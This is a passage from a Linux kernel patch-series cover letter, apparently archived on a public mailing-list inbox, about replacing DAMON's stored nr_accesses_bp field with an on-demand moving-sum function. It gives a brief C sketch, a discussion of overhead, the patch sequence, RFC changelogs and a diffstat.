which are no longer needed.  Finally, remove the nr_accesses_bp field.
The new function is quite simple.
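Because every per-sample step of such a pseudo moving sum subtracts the
same share of the previous window's total, the value after a given number
of samples has a closed form, which is presumably what makes an on-demand
calculation possible.  The sketch below is hypothetical user-space C, not
damon_nr_accesses_mvsum() itself: BP, mvsum_on_demand() and its parameters
are illustrative names, and it assumes one access is worth 10000 bp and
that the sum equals the previous window's access count (last_nr_accesses)
at each window boundary.

```c
#define BP 10000u /* hypothetical: one access expressed in basis points */

/*
 * Hypothetical on-demand pseudo moving sum in bp units.  Because every
 * per-sample step subtracts the same share of the previous window's total,
 * the sum after `elapsed` samples can be derived directly from:
 *   last_total:  accesses counted in the previous aggregation window
 *   nr_accesses: accesses counted so far in the current window
 *   elapsed:     samples elapsed in the current window (0..len_window)
 */
static unsigned int mvsum_on_demand(unsigned int last_total,
				    unsigned int nr_accesses,
				    unsigned int elapsed,
				    unsigned int len_window)
{
	unsigned int share_bp = last_total * BP / len_window;

	/* The previous window's weight shrinks linearly as samples elapse. */
	return last_total * BP - elapsed * share_bp + nr_accesses * BP;
}
```

Under those assumptions it reproduces exactly the value that the
per-sample recurrence (mvsum - last_total * BP / len_window + sample)
would reach, while doing no work at all until someone reads it.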

Discussion
==========

Depending on the use case, multiple nr_accesses readers could run in the
same kdamond_fn() main loop iteration, which is executed once per sampling
interval.  Such readers include the DAMON region exporting tracepoints
(damon_[region_]aggregated and damos_before_apply), DAMOS, and the DAMON
sysfs interface logic for the update_schemes_tried_regions command.  In
this case, the new function is called multiple times, which adds overhead
compared to the old logic that simply reads the field.  Nonetheless, the
new function is quite simple, and the new approach does nothing while
nobody needs to read the value, whereas the old approach had to execute
its update function for each region in every sampling interval.  Hence
the new approach is believed to be even more lightweight in the common
case, and its overhead is negligible anyway.

Another advantage of this change is that it removes one field from
struct damon_region.  On setups that use a large number of DAMON regions,
this could save memory.

Patches Sequence
================

Patch 1 introduces the new function for getting the pseudo moving sum of
nr_accesses on demand.  Patch 2 implements a unit test for the new
function's internal logic.  Patches 3 and 4 update the monitoring logic
and the new function so that the new function is safe to use with the
existing logic.  Patches 5-7 replace uses of nr_accesses_bp in DAMOS,
tracepoints and the DAMON sysfs interface with the new function,
respectively.  Patches 8-10 remove the nr_accesses_bp validation
functions in DAMON core, one by one.  Patches 11 and 12 further remove
tests and a test helper for nr_accesses_bp, respectively.  Patch 13
removes the setups and updates of the nr_accesses_bp field.  Patches
14-16 clean up function parameters that are no longer used after the
previous patch.  Patch 17 removes the function that was used for updating
the nr_accesses_bp field, together with its unit test, which is the only
remaining caller of the function.  Finally, patch 18 removes the
damon_region->nr_accesses_bp field.

Changes from RFC v1.2
- RFC v1.2: https://lore.kernel.org/20260621155715.87932-1-sj@kernel.org
- Explicitly ignore nr_accesses from mvsum at the beginning of
  aggregation.
- Fix a typo in a commit message.
Changes from RFC v1.1
- RFC v1.1: https://lore.kernel.org/20260620172244.90953-1-sj@kernel.org
- Handle next_aggregation_sis < passed_sample_intervals in
  nr_accesses_mvsum().
- Always rescale ->last_nr_accesses for parameter changes.
- Remove unused attrs params from damon_update_region_access_rate() and
  its callers.
Changes from RFC v1
- RFC v1: https://lore.kernel.org/20260619193415.73833-1-sj@kernel.org
- Avoid divide-by-zero from zero aggregation interval.
- Call damon_nr_accesses_mvsum() for damos tracing only when it is enabled.
- Remove obsolete mentions of nr_accesses_bp in comments.

SeongJae Park (18):
  mm/damon: introduce damon_nr_accesses_mvsum()
  mm/damon/tests/core-kunit: test damon_mvsum()
  mm/damon/core: always update ->last_nr_accesses for intervals change
  mm/damon/core: handle unreset nr_accesses in damon_nr_accesses_mvsum()
  mm/damon/core: use damon_nr_accesses_mvsum() in __damos_valid_target()
  mm/damon/core: use damon_nr_accesses_mvsum() for damos region tracing
  mm/damon/sysfs-schemes: use damon_nr_accesses_mvsum() for damo regions
  mm/damon/core: remove damon_warn_fix_nr_accesses_corruption()
  mm/damon/core: remove damon_verify_reset_aggregated()
  mm/damon/core: remove damon_verify_merge_regions_of()
  mm/damon/tests/core-kunit: remove nr_accesses_bp setup and tests
  selftests/damon/drgn_dump_damon_status: do not dump nr_accesses_bp
  mm/damon/core: remove nr_accesses_bp setups and updates
  mm/damon/core: remove attrs param from
    damon_update_region_access_rate()
  mm/damonn/paddr: remove attrs param from __damon_pa_check_access()
  mm/damon/vaddr: remove attrs param from __damon_va_check_access()
  mm/damon/core: remove damon_moving_sum() and its unit test
  mm/damon: remove damon_region->nr_accesses_bp

 include/linux/damon.h                         |  15 +-
 include/trace/events/damon.h                  |   8 +-
 mm/damon/core.c                               | 201 +++++++-----------
 mm/damon/paddr.c                              |   9 +-
 mm/damon/sysfs-schemes.c                      |   6 +-
 mm/damon/tests/core-kunit.h                   |  37 ++--
 mm/damon/vaddr.c                              |  12 +-
 .../selftests/damon/drgn_dump_damon_status.py |   1 -
 8 files changed, 119 insertions(+), 170 deletions(-)

base-commit: e08d3bec1dc38cc991fc819afd698bf7bd07bd6d
-- 
2.47.3



This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox